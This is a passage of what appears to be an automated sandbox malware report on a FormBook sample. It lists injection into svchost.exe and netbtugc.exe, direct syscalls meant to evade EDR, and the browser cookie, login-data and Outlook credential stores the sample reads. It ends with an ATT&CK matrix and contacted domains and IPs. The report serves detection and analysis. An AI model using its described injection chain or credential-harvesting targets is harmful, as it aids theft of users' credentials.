            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D483A mov eax, dword ptr fs:[00000030h]2_2_035D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E8C0 mov eax, dword ptr fs:[00000030h]2_2_0355E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C8F9 mov eax, dword ptr fs:[00000030h]2_2_0356C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C8F9 mov eax, dword ptr fs:[00000030h]2_2_0356C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FA8E4 mov eax, dword ptr fs:[00000030h]2_2_035FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC89D mov eax, dword ptr fs:[00000030h]2_2_035BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530887 mov eax, dword ptr fs:[00000030h]2_2_03530887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]2_2_0352CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]2_2_0352CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]2_2_0352CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]2_2_0352CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]2_2_0352CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CF50 mov eax, dword ptr fs:[00000030h]2_2_0352CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CF50 mov eax, dword ptr fs:[00000030h]2_2_0356CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604F68 mov eax, dword ptr fs:[00000030h]2_2_03604F68
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D0F50 mov eax, dword ptr fs:[00000030h]2_2_035D0F50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4F40 mov eax, dword ptr fs:[00000030h]2_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4F40 mov eax, dword ptr fs:[00000030h]2_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4F40 mov eax, dword ptr fs:[00000030h]2_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4F40 mov eax, dword ptr fs:[00000030h]2_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4F42 mov eax, dword ptr fs:[00000030h]2_2_035D4F42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355AF69 mov eax, dword ptr fs:[00000030h]2_2_0355AF69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355AF69 mov eax, dword ptr fs:[00000030h]2_2_0355AF69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2F60 mov eax, dword ptr fs:[00000030h]2_2_035D2F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2F60 mov eax, dword ptr fs:[00000030h]2_2_035D2F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532F12 mov eax, dword ptr fs:[00000030h]2_2_03532F12
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CF1F mov eax, dword ptr fs:[00000030h]2_2_0356CF1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E6F00 mov eax, dword ptr fs:[00000030h]2_2_035E6F00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EF28 mov eax, dword ptr fs:[00000030h]2_2_0355EF28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604FE7 mov eax, dword ptr fs:[00000030h]2_2_03604FE7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352EFD8 mov eax, dword ptr fs:[00000030h]2_2_0352EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352EFD8 mov eax, dword ptr fs:[00000030h]2_2_0352EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352EFD8 mov eax, dword ptr fs:[00000030h]2_2_0352EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532FC8 mov eax, dword ptr fs:[00000030h]2_2_03532FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532FC8 mov eax, dword ptr fs:[00000030h]2_2_03532FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532FC8 mov eax, dword ptr fs:[00000030h]2_2_03532FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532FC8 mov eax, dword ptr fs:[00000030h]2_2_03532FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03570FF6 mov eax, dword ptr fs:[00000030h]2_2_03570FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03570FF6 mov eax, dword ptr fs:[00000030h]2_2_03570FF6
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F1A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00F1A66C
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F081AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F081AC
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F08189 SetUnhandledExceptionFilter,0_2_00F08189

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtOpenKeyEx: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtQueryValueKey: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeNtClose: Direct from: 0x77377B2E
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\CCE 30411252024.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 992Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\CCE 30411252024.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 92E008Jump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F1B106 LogonUserW,0_2_00F1B106
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EE3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00EE3D19
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F2411C SendInput,keybd_event,0_2_00F2411C
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F274E7 mouse_event,0_2_00F274E7
            Source: C:\Users\user\Desktop\CCE 30411252024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CCE 30411252024.exe"Jump to behavior
            Source: C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F1A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00F1A66C
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F271FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00F271FA
            Source: UIOYLdBBxOZnTzrp.exe, 00000005.00000000.2244149291.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 00000005.00000002.4604433405.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604417591.0000000001720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: CCE 30411252024.exe, UIOYLdBBxOZnTzrp.exe, 00000005.00000000.2244149291.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 00000005.00000002.4604433405.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604417591.0000000001720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: UIOYLdBBxOZnTzrp.exe, 00000005.00000000.2244149291.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 00000005.00000002.4604433405.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604417591.0000000001720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: CCE 30411252024.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
            Source: UIOYLdBBxOZnTzrp.exe, 00000005.00000000.2244149291.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 00000005.00000002.4604433405.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604417591.0000000001720000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F065C4 cpuid 0_2_00F065C4
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F3091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_00F3091D
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F5B340 GetUserNameW,0_2_00F5B340
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F11E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00F11E8E
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00EFDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00EFDDC0

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2318504585.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4603077046.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4604764076.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2319589382.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2317721202.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4603508977.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: CCE 30411252024.exeBinary or memory string: WIN_81
            Source: CCE 30411252024.exeBinary or memory string: WIN_XP
            Source: CCE 30411252024.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
            Source: CCE 30411252024.exeBinary or memory string: WIN_XPe
            Source: CCE 30411252024.exeBinary or memory string: WIN_VISTA
            Source: CCE 30411252024.exeBinary or memory string: WIN_7
            Source: CCE 30411252024.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2318504585.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4603077046.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4604764076.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2319589382.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2317721202.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4603508977.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F38C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00F38C4F
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F3923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00F3923B

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1566620 Sample: CCE 30411252024.exe Startdate: 02/12/2024 Architecture: WINDOWS Score: 100 28 www.joyesi.xyz 2->28 30 www.techchains.info 2->30 32 16 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 6 other signatures 2->50 10 CCE 30411252024.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 UIOYLdBBxOZnTzrp.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 UIOYLdBBxOZnTzrp.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.rssnewscast.com 91.195.240.94, 50020, 50021, 50022 SEDO-ASDE Germany 22->34 36 elettrosistemista.zip 195.110.124.133, 50030, 50031, 50032 REGISTER-ASIT 